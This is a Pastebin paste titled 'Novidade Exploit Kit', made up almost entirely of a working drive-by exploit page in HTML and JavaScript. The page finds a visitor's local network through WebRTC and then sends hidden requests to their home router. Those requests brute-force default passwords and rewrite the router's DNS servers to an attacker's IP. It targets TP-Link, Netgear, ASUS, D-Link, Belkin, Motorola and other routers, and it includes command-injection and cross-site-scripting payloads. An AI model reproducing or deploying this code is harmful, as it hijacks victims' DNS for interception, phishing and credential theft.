API tools faq
paste
Advertisement
Guest User

Novidade Exploit Kit

a guest
Dec 10th, 2019
252
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.69 KB | None | 0 0
raw download clone embed print report
  1. <html><head><script type="text/javascript" src="e_x.js"></script></head>
  2. <body>
  3. <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
  4. <script language="javascript">
  5.  
  6. var evil = "%31%39%32%2E%31%36%38%2E%30%2E%31%";
  7. var pDNS = "37.139.50.45";
  8. var sDNS = "8.8.8.8";
  9. var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","<eopl>"];
  10. var gstp=400;
  11. var pstp=5000;
  12. function exp(url, data, method){
  13. if(method=="GET"){
  14. document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
  15. if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
  16. }
  17. else{
  18. document.write('<body></body>');
  19. var ifrm = document.createElement('IFRAME');
  20. ifrm.height="1px";
  21. ifrm.width="1px";
  22. document.body.appendChild(ifrm);
  23.  
  24. var f=ifrm.contentWindow.document.createElement('FORM');
  25. f.name='f';
  26. f.method=method;
  27. f.action=url;
  28. var el=data.split('&');
  29. for(i=0;i<el.length;i++)
  30. {
  31. var e=el[i].split('=');
  32. var t=ifrm.contentWindow.document.createElement('INPUT');
  33. t.type='TEXT';
  34. t.id=e[0];
  35. t.name=e[0];
  36. t.value=e[1];
  37. f.appendChild(t);
  38. }
  39. ifrm.contentWindow.document.body.appendChild(f);
  40. f.submit();
  41. var tm=setTimeout(function(){window.stop();},pstp);
  42. }
  43. }
  44. function srq(ip) {
  45. for(i=0;i<12;i++){
  46.  
  47. var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
  48. var method = "GET";
  49. url = url1.replace("$1$","");
  50. var cred="admin";
  51. if(passlist[i]!="")
  52. cred=cred+":"+passlist[i];
  53. cred = cred+"@";
  54. url = url1.replace("$1$",cred);
  55. exp(url, "", method);
  56. }
  57.  
  58. }
  59. function e_belkin(ip)
  60. {
  61. var method = "POST";
  62. var url = "";
  63. var data ="";
  64.  
  65. url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
  66. exp(url, "", "GET");
  67.  
  68. url="http://"+ip+"/cgi-bin/setup_dns.exe";
  69. data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
  70. exp(url, data, method);
  71. }
  72.  
  73. function e_webcam(ip)
  74. {
  75. var method = "POST";
  76. var url = "";
  77. var data ="";
  78.  
  79. url="http://"+ip+"/cgi-bin/webcm";
  80. data="getpage=../html/home.htm&errorpage=../html/index.html&login:command/username=admin&login:command/password=admin&var:errormsg=Error";
  81. exp(url, data, method);
  82.  
  83. url="http://"+ip+"/cgi-bin/webcm";
  84. data="getpage=../html/setup/dns.htm&resolver:settings/nameserver1="+pDNS+"&resolver:settings/nameserver2="+sDNS+"&dproxy:settings/state=2";
  85. exp(url, data, method);
  86. }
  87.  
  88.  
  89. function p_exp(ip) {
  90. e_belkin(ip);
  91. e_webcam(ip);
  92.  
  93. var method = "POST";
  94. var url = "";
  95. var data ="";
  96.  
  97. url = "http://admin:admin@"+ip+"/apply.cgi";
  98. data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
  99. exp(url, data, method);
  100.  
  101. url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
  102. data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
  103. exp(url, data, method);
  104.  
  105. url="http://"+ip+"/goform/AdvSetDns";
  106. data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
  107. exp(url, data, method); /*Unicorn WB-3300NR*/
  108.  
  109. url="http://"+ip+"/login.cgi";
  110. data="login_name=admin&login_pass=";
  111. exp(url, data, method);
  112.  
  113. url="http://"+ip+"/h_wan_fix.cgi";
  114. data="static_dns1="+pDNS+"&static_dns2="+sDNS;
  115. exp(url, data, method);
  116.  
  117. }
  118.  
  119. function e_moto(ip)
  120. {
  121. /*var method = "GET";
  122. var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
  123. exp(url, "", method);
  124.  
  125. url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
  126. exp(url, "", POST); */
  127. var i1 = document.createElement('IMG');
  128. document.body.appendChild(i1);
  129. var i2 = document.createElement('IMG');
  130. document.body.appendChild(i2);
  131. i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
  132. i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
  133.  
  134. }/*Motorola*/
  135.  
  136. function r_exp(ip) {
  137.  
  138. var method = "GET";
  139. var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
  140. //exp(url, "", method);
  141.  
  142. url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1";
  143. exp(url, "", method); /*DGN 1000/DGN2200*/
  144.  
  145. url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
  146. exp(url, "", method); /*asus rt n66u*/
  147.  
  148. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
  149. exp(url, "", method); /*asus rt n56u*/
  150.  
  151. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
  152. exp(url, "", method); /*asus rt n56u*/
  153.  
  154. url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
  155. exp(url, "", method);/*asus nt-12*/
  156.  
  157. url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
  158. exp(url, "", method);
  159.  
  160. url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  161. exp(url, "", method);
  162.  
  163. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  164. exp(url, "", method); /*Philips*/
  165.  
  166. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  167. exp(url, "", method);/*Motorola SBG901*/
  168.  
  169. url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
  170. exp(url, "", method);
  171.  
  172. url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
  173. exp(url, "", method);
  174.  
  175. url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
  176. exp(url, "", method);
  177.  
  178. url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  179. exp(url, "", method);
  180.  
  181. url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  182. exp(url, "", method);
  183.  
  184. url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  185. exp(url, "", method);
  186.  
  187. url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  188. exp(url, "", method);
  189.  
  190. url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  191. exp(url, "", method);
  192.  
  193. url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  194. exp(url, "", method);
  195.  
  196. url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
  197. exp(url, "", method);
  198.  
  199. url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
  200. exp(url, "", method);
  201.  
  202. url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
  203. exp(url, "", method);
  204.  
  205. url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
  206. exp(url, "", method);
  207.  
  208. url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
  209. exp(url, "", method);
  210.  
  211. url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
  212. exp(url, "", method);
  213.  
  214. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
  215. exp(url, "", method);
  216.  
  217. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
  218. exp(url, "", method);
  219.  
  220. url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
  221. exp(url, "", method);
  222.  
  223. url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
  224. exp(url, "", method); /*DI 604*/
  225.  
  226.  
  227. var t=setTimeout(function(){p_exp(ip);},1000);
  228. srq(ip);
  229. e_moto(ip);
  230. }
  231. var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
  232. //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
  233.  
  234. getIPs(function(ip) {
  235. if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
  236. var gw = ["192.168.1.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
  237. var sip = ip.split(".");
  238. ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
  239. var i = 0;
  240. var j = 0;
  241. for (i = 0; i < gw.length; i++) {
  242. if (ip == gw[i]) {
  243. j = j + 1;
  244. break;
  245. }
  246. };
  247. i = i + 1;
  248. if (j > 0) {
  249. r_exp(ip);
  250. };
  251. }
  252. });
  253.  
  254. </script>
  255. </body>
  256. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!